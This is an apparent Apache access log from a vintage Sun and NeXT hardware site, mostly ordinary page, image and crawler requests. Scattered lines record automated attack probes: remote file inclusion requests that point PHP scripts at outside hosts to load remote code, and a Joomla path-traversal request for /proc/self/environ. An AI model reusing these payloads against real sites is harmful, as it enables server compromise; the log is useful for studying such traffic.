203.217.92.81 - - [29/Aug/2010:11:41:37 -0400] "GET /sun_ss2/ss2_5.jpg HTTP/1.1" 200 31262 "http://www.obsolyte.com/sun_ss2/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8"
203.217.92.81 - - [29/Aug/2010:11:41:38 -0400] "GET /favicon.ico HTTP/1.1" 200 318 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8"
207.46.195.228 - - [29/Aug/2010:11:42:56 -0400] "GET / HTTP/1.1" 304 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
203.217.92.81 - - [29/Aug/2010:11:44:00 -0400] "GET /sunFAQ/serial/ HTTP/1.1" 200 13600 "http://www.obsolyte.com/sun_ss2/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8"
203.217.92.81 - - [29/Aug/2010:11:44:00 -0400] "GET /images/logo_small.gif HTTP/1.1" 200 4441 "http://www.obsolyte.com/sunFAQ/serial/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8"
203.217.92.81 - - [29/Aug/2010:11:44:00 -0400] "GET /sunFAQ/serial/9.gif HTTP/1.1" 200 2263 "http://www.obsolyte.com/sunFAQ/serial/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8"
203.217.92.81 - - [29/Aug/2010:11:44:00 -0400] "GET /sunFAQ/serial/8-25.gif HTTP/1.1" 200 4067 "http://www.obsolyte.com/sunFAQ/serial/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8"
203.217.92.81 - - [29/Aug/2010:11:44:00 -0400] "GET /sunFAQ/serial/null_modem.jpg HTTP/1.1" 200 11445 "http://www.obsolyte.com/sunFAQ/serial/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8"
203.217.92.81 - - [29/Aug/2010:11:44:01 -0400] "GET /sunFAQ/serial/pin_ports.jpg HTTP/1.1" 200 15579 "http://www.obsolyte.com/sunFAQ/serial/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8"
203.217.92.81 - - [29/Aug/2010:11:44:01 -0400] "GET /sunFAQ/serial/9pin.jpg HTTP/1.1" 200 13877 "http://www.obsolyte.com/sunFAQ/serial/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8"
203.217.92.81 - - [29/Aug/2010:11:44:13 -0400] "GET /sunFAQ/faq_nvram.html HTTP/1.1" 200 69181 "http://www.obsolyte.com/sun_ss2/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8"
203.217.92.81 - - [29/Aug/2010:11:44:13 -0400] "GET /sunFAQ/sun-nvram.gif HTTP/1.1" 200 23578 "http://www.obsolyte.com/sunFAQ/faq_nvram.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8"
78.70.76.182 - - [29/Aug/2010:11:44:44 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 313 "-" "libwww-perl/5.808"
188.146.128.58 - - [29/Aug/2010:11:49:11 -0400] "GET /vanagon/VanagonProTraining/DigiFant/039.jpg HTTP/1.1" 200 87917 "http://www.google.pl/imgres?imgurl=http://www.obsolyte.com/vanagon/VanagonProTraining/DigiFant/039.jpg&imgrefurl=http://www.thesamba.com/vw/forum/viewtopic.php%3Fp%3D3154858&usg=__YB2g2bFU8UrbdN_s42OthvRGtwg=&h=1088&w=845&sz=86&hl=pl&start=58&zoom=1&um=1&itbs=1&tbnid=pQQbbeARnC_DVM:&tbnh=150&tbnw=116&prev=/images%3Fq%3Dsyncro%2Bwikipedia%26start%3D40%26um%3D1%26hl%3Dpl%26sa%3DN%26rlz%3D1R2ADSA_plPL383%26ndsp%3D20%26tbs%3Disch:1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) )"
188.146.128.58 - - [29/Aug/2010:11:49:16 -0400] "GET /favicon.ico HTTP/1.1" 200 318 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) )"
122.201.81.53 - - [29/Aug/2010:11:50:50 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 313 "-" "libwww-perl/5.810"
61.172.24.120 - - [29/Aug/2010:11:52:35 -0400] "GET /sunPICS/3_280/3-280_VME_backplane_jumpers.jpg HTTP/1.1" 200 43245 "http://www.google.com.hk/imglanding?q=VME%20Backplane&imgurl=http://rocky.digikey.com/weblib/Vector/Web%2520Photos/New%2520Photos/4610-8-1A.jpg&imgrefurl=http://ca.digikey.com/1/3/index1690.html&h=640&w=640&sz=232&tbnid=x_cH4alQsPHYtM:&tbnh=137&tbnw=137&prev=/images%3Fq%3DVME%2BBackplane&zoom=1&hl=zh-CN&usg=__pCZeDMG4hxVHS9lt5Lap0CrSh2I=&sa=X&ei=N1Z6TOXkJ8XJce-N4bkJ&ved=0CCAQ9QEwBg&start=0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
61.172.24.120 - - [29/Aug/2010:11:52:35 -0400] "GET /sunPICS/3_280/3-280_VME_backplane_card_side.jpg HTTP/1.1" 200 39389 "http://www.google.com.hk/imglanding?q=VME%20Backplane&imgurl=http://rocky.digikey.com/weblib/Vector/Web%2520Photos/New%2520Photos/4610-8-1A.jpg&imgrefurl=http://ca.digikey.com/1/3/index1690.html&h=640&w=640&sz=232&tbnid=x_cH4alQsPHYtM:&tbnh=137&tbnw=137&prev=/images%3Fq%3DVME%2BBackplane&zoom=1&hl=zh-CN&usg=__pCZeDMG4hxVHS9lt5Lap0CrSh2I=&sa=X&ei=N1Z6TOXkJ8XJce-N4bkJ&ved=0CCAQ9QEwBg&start=0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
87.250.253.243 - - [29/Aug/2010:11:56:42 -0400] "GET /sunFAQ/faq_m68k/mc68030.html HTTP/1.1" 404 304 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
71.229.123.211 - - [29/Aug/2010:11:57:13 -0400] "GET /~strabal/lucypics/3-Guys.jpg HTTP/1.1" 200 130482 "http://www.weblo.com/celebrity/available/Neil_Peart/696510/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
212.125.225.212 - - [29/Aug/2010:11:57:38 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 313 "-" "libwww-perl/5.834"
184.107.48.236 - - [29/Aug/2010:12:00:51 -0400] "GET //?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 12550 "-" "libwww-perl/5.810"
174.121.166.146 - - [29/Aug/2010:12:03:07 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://yiom.org/files/respon1.txt??? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
174.121.166.146 - - [29/Aug/2010:12:03:07 -0400] "GET /logs/access_log%20%20/lostpasswd.php?env[include_prefix]=http://yiom.org/files/respon1.txt??? HTTP/1.1" 404 308 "-" "Mozilla/5.0"
174.121.166.146 - - [29/Aug/2010:12:03:07 -0400] "GET /lostpasswd.php?env[include_prefix]=http://yiom.org/files/respon1.txt??? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
174.121.166.146 - - [29/Aug/2010:12:03:09 -0400] "GET /lostpasswd.php?env[include_prefix]=http://yiom.org/files/respon1.txt??? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
174.121.166.146 - - [29/Aug/2010:12:03:09 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://yiom.org/files/respon1.txt??? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
174.121.166.146 - - [29/Aug/2010:12:03:09 -0400] "GET /logs/access_log%20%20/lostpasswd.php?env[include_prefix]=http://yiom.org/files/respon1.txt??? HTTP/1.1" 404 308 "-" "Mozilla/5.0"
174.121.166.146 - - [29/Aug/2010:12:03:10 -0400] "GET /lostpasswd.php?env[include_prefix]=http://yiom.org/files/respon1.txt??? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
174.121.166.146 - - [29/Aug/2010:12:03:10 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://yiom.org/files/respon1.txt??? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
174.121.166.146 - - [29/Aug/2010:12:03:10 -0400] "GET /logs/access_log%20%20/lostpasswd.php?env[include_prefix]=http://yiom.org/files/respon1.txt??? HTTP/1.1" 404 308 "-" "Mozilla/5.0"
94.240.48.10 - - [29/Aug/2010:12:11:09 -0400] "GET /vanagon/VanagonProTraining/DigiFant/043.jpg HTTP/1.0" 200 83551 "http://www.thesamba.com/vw/forum/viewtopic.php?t=382053&postdays=0&postorder=asc&start=20" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.0.2) Gecko/2008091620 Firefox/3.0.2"
94.240.48.10 - - [29/Aug/2010:12:11:11 -0400] "GET /vanagon/VanagonProTraining/DigiFant/042.jpg HTTP/1.0" 200 80499 "http://www.thesamba.com/vw/forum/viewtopic.php?t=382053&postdays=0&postorder=asc&start=20" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.0.2) Gecko/2008091620 Firefox/3.0.2"
121.44.238.230 - - [29/Aug/2010:12:12:39 -0400] "GET /sun_ss2/ HTTP/1.1" 200 9016 "http://www.google.com/cse?hl=en&domains=linuxmint.com&q=sparcstation+2&sa=Search&sitesearch=&hl=en&client=pub-5386907765195439&forid=1&channel=4474582015&ie=UTF-8&oe=UTF-8&cof=GALT%3A%23008000%3BGL%3A1%3BDIV%3A%23EEEEEE%3BVLC%3A663399%3BAH%3Acenter%3BBGC%3AFFFFFF%3BLBGC%3AFFFFFF%3BALC%3A0000CC%3BLC%3A0000CC%3BT%3A000000%3BGFNT%3A7777CC%3B%0D%0AGIMP%3A0000CC%3BFORID%3A1&hl=en&siteurl=www.linuxmint.com%2Fstart%2Fisadora%2F" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Linux Mint/9 (Isadora) Firefox/3.6.3"
121.44.238.230 - - [29/Aug/2010:12:12:40 -0400] "GET /sun_ss2/ss2_2.jpg HTTP/1.1" 200 8199 "http://www.obsolyte.com/sun_ss2/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Linux Mint/9 (Isadora) Firefox/3.6.3"
121.44.238.230 - - [29/Aug/2010:12:12:40 -0400] "GET /sun_ss2/sun4_75.gif HTTP/1.1" 200 5693 "http://www.obsolyte.com/sun_ss2/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Linux Mint/9 (Isadora) Firefox/3.6.3"
121.44.238.230 - - [29/Aug/2010:12:12:40 -0400] "GET /sun_ss2/ss2_3.jpg HTTP/1.1" 200 21867 "http://www.obsolyte.com/sun_ss2/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Linux Mint/9 (Isadora) Firefox/3.6.3"
121.44.238.230 - - [29/Aug/2010:12:12:40 -0400] "GET /sun_ss2/ss2_4.jpg HTTP/1.1" 200 15434 "http://www.obsolyte.com/sun_ss2/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Linux Mint/9 (Isadora) Firefox/3.6.3"
121.44.238.230 - - [29/Aug/2010:12:12:41 -0400] "GET /sun_ss2/ss2_5.jpg HTTP/1.1" 200 31262 "http://www.obsolyte.com/sun_ss2/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Linux Mint/9 (Isadora) Firefox/3.6.3"
121.44.238.230 - - [29/Aug/2010:12:12:41 -0400] "GET /favicon.ico HTTP/1.1" 200 318 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Linux Mint/9 (Isadora) Firefox/3.6.3"
71.12.211.202 - - [29/Aug/2010:12:13:10 -0400] "GET /vanagon/VanagonProTraining/DigiFant/014.jpg HTTP/1.1" 200 107353 "http://www.thesamba.com/vw/forum/viewtopic.php?t=340574&highlight=cylinder+misfire" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.11) Gecko/20100701 Firefox/3.5.11"
71.12.211.202 - - [29/Aug/2010:12:13:10 -0400] "GET /vanagon/VanagonProTraining/DigiFant/015.jpg HTTP/1.1" 200 110378 "http://www.thesamba.com/vw/forum/viewtopic.php?t=340574&highlight=cylinder+misfire" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.11) Gecko/20100701 Firefox/3.5.11"
71.12.211.202 - - [29/Aug/2010:12:13:10 -0400] "GET /vanagon/VanagonProTraining/DigiFant/016.jpg HTTP/1.1" 200 109813 "http://www.thesamba.com/vw/forum/viewtopic.php?t=340574&highlight=cylinder+misfire" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.11) Gecko/20100701 Firefox/3.5.11"
66.249.71.123 - - [29/Aug/2010:12:15:15 -0400] "GET /next/m_slab_rear.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
200.78.238.157 - - [29/Aug/2010:12:18:22 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ktsmile.com//administrator/components/com_virtuemart/ID-RFI.txt?? HTTP/1.1" 404 287 "-" "libwww-perl/5.805"
66.249.71.123 - - [29/Aug/2010:12:19:50 -0400] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.52.53.244 - - [29/Aug/2010:12:20:00 -0400] "GET /robots.txt HTTP/1.1" 404 286 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.201.66.60 - - [29/Aug/2010:12:21:35 -0400] "GET /logs/error_log.1 HTTP/1.1" 200 668139 "http://www.obsolyte.com/logs/error_log.1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
109.165.116.162 - - [29/Aug/2010:12:21:54 -0400] "GET /sun_lx/ HTTP/1.1" 200 6271 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 MRA 5.5 (build 02842) Firefox/3.6.8"
109.165.116.162 - - [29/Aug/2010:12:21:55 -0400] "GET /sun_lx/lx_front.jpg HTTP/1.1" 200 10230 "http://obsolyte.com/sun_lx/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 MRA 5.5 (build 02842) Firefox/3.6.8"
109.165.116.162 - - [29/Aug/2010:12:21:55 -0400] "GET /sun_lx/00pdficon.gif HTTP/1.1" 200 500 "http://obsolyte.com/sun_lx/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 MRA 5.5 (build 02842) Firefox/3.6.8"
109.165.116.162 - - [29/Aug/2010:12:21:55 -0400] "GET /sun_lx/lx_bottom.jpg HTTP/1.1" 200 13297 "http://obsolyte.com/sun_lx/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 MRA 5.5 (build 02842) Firefox/3.6.8"
109.165.116.162 - - [29/Aug/2010:12:21:56 -0400] "GET /sun_lx/lx_mb.gif HTTP/1.1" 200 6581 "http://obsolyte.com/sun_lx/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 MRA 5.5 (build 02842) Firefox/3.6.8"
109.165.116.162 - - [29/Aug/2010:12:21:56 -0400] "GET /sun_lx/lx_videosimm.jpg HTTP/1.1" 200 20106 "http://obsolyte.com/sun_lx/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 MRA 5.5 (build 02842) Firefox/3.6.8"
109.165.116.162 - - [29/Aug/2010:12:21:56 -0400] "GET /sun_lx/lx_rear.jpg HTTP/1.1" 200 24353 "http://obsolyte.com/sun_lx/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 MRA 5.5 (build 02842) Firefox/3.6.8"
109.165.116.162 - - [29/Aug/2010:12:21:56 -0400] "GET /sun_lx/lx_mb.jpg HTTP/1.1" 200 53874 "http://obsolyte.com/sun_lx/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 MRA 5.5 (build 02842) Firefox/3.6.8"
109.165.116.162 - - [29/Aug/2010:12:21:56 -0400] "GET /sun_lx/lx_open.jpg HTTP/1.1" 200 28482 "http://obsolyte.com/sun_lx/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 MRA 5.5 (build 02842) Firefox/3.6.8"
109.165.116.162 - - [29/Aug/2010:12:21:57 -0400] "GET /favicon.ico HTTP/1.1" 200 318 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 MRA 5.5 (build 02842) Firefox/3.6.8"
67.195.112.30 - - [29/Aug/2010:12:23:33 -0400] "GET /docs/yp-tools-2.3/AUTHORS HTTP/1.0" 404 289 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
212.125.225.212 - - [29/Aug/2010:12:24:02 -0400] "GET /logs/error_log.1//bbs//skin/ggambo7002_board/write.php?dir=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 330 "-" "libwww-perl/5.834"
212.125.225.212 - - [29/Aug/2010:12:24:02 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 313 "-" "libwww-perl/5.834"
212.125.225.212 - - [29/Aug/2010:12:24:03 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 318 "-" "libwww-perl/5.834"
202.3.77.174 - - [29/Aug/2010:12:24:24 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.ktsmile.com//administrator/components/com_virtuemart/ID-RFI.txt?? HTTP/1.1" 404 287 "-" "libwww-perl/5.805"
65.55.37.188 - - [29/Aug/2010:12:25:11 -0400] "GET /sunPICS/sparc1/parrot2.jpg HTTP/1.1" 200 17857 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.37.188 - - [29/Aug/2010:12:25:17 -0400] "GET /sunPICS/misc/sun4_kbd0.jpg HTTP/1.1" 200 14761 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.199.45 - - [29/Aug/2010:12:25:24 -0400] "GET /sunPICS/ HTTP/1.1" 304 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.37.188 - - [29/Aug/2010:12:25:43 -0400] "GET /sunPICS/misc/3dlogo.gif HTTP/1.1" 200 108876 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.37.173 - - [29/Aug/2010:12:25:48 -0400] "GET /robots.txt HTTP/1.1" 404 286 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.37.173 - - [29/Aug/2010:12:25:48 -0400] "GET /sun_ipc/ HTTP/1.1" 304 - "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
66.249.71.123 - - [29/Aug/2010:12:26:24 -0400] "GET / HTTP/1.1" 200 12550 "-" "SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
220.181.7.71 - - [29/Aug/2010:12:28:09 -0400] "GET / HTTP/1.1" 200 12550 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
184.107.48.236 - - [29/Aug/2010:12:28:17 -0400] "GET /logs/access_log//?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-" "libwww-perl/5.810"
184.107.48.236 - - [29/Aug/2010:12:28:17 -0400] "GET //?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 12550 "-" "libwww-perl/5.810"
184.107.48.236 - - [29/Aug/2010:12:28:17 -0400] "GET /logs//?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2610 "-" "libwww-perl/5.810"
123.125.66.64 - - [29/Aug/2010:12:29:07 -0400] "GET / HTTP/1.1" 200 12550 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
74.222.1.53 - - [29/Aug/2010:12:29:43 -0400] "GET /robots.txt HTTP/1.0" 404 274 "http://obsolyte.com/robots.txt" "Huaweisymantecspider (compatible; MSIE 8.0; DSE-support@huaweisymantec.com)"
74.222.1.53 - - [29/Aug/2010:12:29:43 -0400] "GET / HTTP/1.0" 200 12550 "http://obsolyte.com/" "Huaweisymantecspider (compatible; MSIE 8.0; DSE-support@huaweisymantec.com)"
65.55.37.188 - - [29/Aug/2010:12:30:33 -0400] "GET /sunPICS/ipx/inside1.jpg HTTP/1.1" 200 17242 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.37.188 - - [29/Aug/2010:12:31:00 -0400] "GET /sunPICS/sparc_vme/sun4_330_card.jpg HTTP/1.1" 200 36591 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
66.249.71.180 - - [29/Aug/2010:12:33:28 -0400] "GET /sun_ss5/ss5_promo.pdf HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.37.188 - - [29/Aug/2010:12:34:28 -0400] "GET /sunPICS/sparc10/sparc10cpu.jpg HTTP/1.1" 200 15620 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.37.188 - - [29/Aug/2010:12:34:54 -0400] "GET /sunPICS/misc/411.jpg HTTP/1.1" 200 12119 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.37.188 - - [29/Aug/2010:12:35:22 -0400] "GET /sunPICS/sparc_vme/sparc670-5.jpg HTTP/1.1" 200 82821 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.37.188 - - [29/Aug/2010:12:35:30 -0400] "GET /sunPICS/sparc10/ss10_int.jpg HTTP/1.1" 200 559372 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.37.188 - - [29/Aug/2010:12:35:32 -0400] "GET /sunPICS/sparc_vme/4630_systemboard.jpg HTTP/1.1" 200 73380 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.37.188 - - [29/Aug/2010:12:35:45 -0400] "GET /sunPICS/sun3/sun3_160_rack_deskside.jpg HTTP/1.1" 200 66980 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
78.70.76.182 - - [29/Aug/2010:12:35:46 -0400] "GET /logs/error_log.1//bbs//skin/ggambo7002_board/write.php?dir=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 330 "-" "libwww-perl/5.808"
78.70.76.182 - - [29/Aug/2010:12:35:47 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 313 "-" "libwww-perl/5.808"
78.70.76.182 - - [29/Aug/2010:12:35:47 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 318 "-" "libwww-perl/5.808"
65.55.37.188 - - [29/Aug/2010:12:36:58 -0400] "GET /sunPICS/sun3/sun3-470-front-1.jpg HTTP/1.1" 200 74351 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
87.250.253.243 - - [29/Aug/2010:12:39:23 -0400] "GET /cgi-bin/man?-M/usr/openwin/man:/usr/man?xstdcmap HTTP/1.1" 404 287 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
65.55.37.188 - - [29/Aug/2010:12:39:33 -0400] "GET /sunPICS/misc/Sun911_case.jpg HTTP/1.1" 200 10725 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
72.87.93.4 - - [29/Aug/2010:12:42:50 -0400] "GET /sun3/ HTTP/1.1" 200 5383 "http://www.google.com/url?sa=t&source=web&cd=2&ved=0CBkQFjAB&url=http%3A%2F%2Fwww.obsolyte.com%2Fsun3%2F&rct=j&q=501-1208&ei=BGJ6TK6PEcKC8gbOvJD1Bg&usg=AFQjCNH1oYGATOhY-nu3Lkq4VOBY8IaeHA" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; Creative AutoUpdate v1.40.01)"
72.87.93.4 - - [29/Aug/2010:12:42:50 -0400] "GET /sun3/images/slidebar.gif HTTP/1.1" 200 8656 "http://www.obsolyte.com/sun3/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; Creative AutoUpdate v1.40.01)"
72.87.93.4 - - [29/Aug/2010:12:42:50 -0400] "GET /sun3/images/sun3_160.gif HTTP/1.1" 200 8512 "http://www.obsolyte.com/sun3/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; Creative AutoUpdate v1.40.01)"
72.87.93.4 - - [29/Aug/2010:12:42:50 -0400] "GET /favicon.ico HTTP/1.1" 200 318 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; Creative AutoUpdate v1.40.01)"
109.165.116.162 - - [29/Aug/2010:12:45:27 -0400] "GET / HTTP/1.1" 200 12550 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 MRA 5.5 (build 02842) Firefox/3.6.8"
109.165.116.162 - - [29/Aug/2010:12:45:28 -0400] "GET /images/paper.gif HTTP/1.1" 200 1593 "http://obsolyte.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 MRA 5.5 (build 02842) Firefox/3.6.8"
109.165.116.162 - - [29/Aug/2010:12:45:28 -0400] "GET /favicon.gif HTTP/1.1" 200 887 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 MRA 5.5 (build 02842) Firefox/3.6.8"
109.165.116.162 - - [29/Aug/2010:12:45:28 -0400] "GET /images/title4.gif HTTP/1.1" 200 4678 "http://obsolyte.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 MRA 5.5 (build 02842) Firefox/3.6.8"
109.165.116.162 - - [29/Aug/2010:12:45:28 -0400] "GET /images/sun_logo.gif HTTP/1.1" 200 1477 "http://obsolyte.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 MRA 5.5 (build 02842) Firefox/3.6.8"
109.165.116.162 - - [29/Aug/2010:12:45:28 -0400] "GET /images/sgi_logo.gif HTTP/1.1" 200 2157 "http://obsolyte.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 MRA 5.5 (build 02842) Firefox/3.6.8"
109.165.116.162 - - [29/Aug/2010:12:45:28 -0400] "GET /images/next_logo.gif HTTP/1.1" 200 1864 "http://obsolyte.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 MRA 5.5 (build 02842) Firefox/3.6.8"
